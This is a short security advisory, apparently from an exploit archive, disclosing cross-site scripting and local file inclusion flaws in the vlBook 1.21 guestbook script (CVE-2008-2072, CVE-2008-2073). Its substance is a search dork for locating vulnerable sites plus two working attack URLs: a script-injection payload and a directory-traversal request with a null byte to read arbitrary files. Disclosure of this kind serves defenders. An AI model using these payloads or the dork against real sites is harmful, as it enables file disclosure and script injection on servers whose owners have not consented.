vlBook 1.21 (ALL VERSION)

2008.05.06

Credit: IRCRASH

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-2072 | CVE-2008-2073

CWE: N/A

----------------------------------------------------------------
Script : vlBook 1.21 (ALL VERSION)
Type : Multiple Remote Vulnerabilities (LFI/XSS)
----------------------------------------------------------------
Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)
----------------------------------------------------------------
Our Site : Http://IRCRASH.COM
----------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------
Script Download : http://home.vlab.info/vlbook_1.21.zip
----------------------------------------------------------------
DORK : "Powered by vlBook 1.21"
----------------------------------------------------------------
#XSS Address : http://example/?l=" <script>alert('xss')</script>
----------------------------------------------------------------
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00
----------------------------------------------------------------
TNx : God......
----------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

vlBook 1.21 (ALL VERSION)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.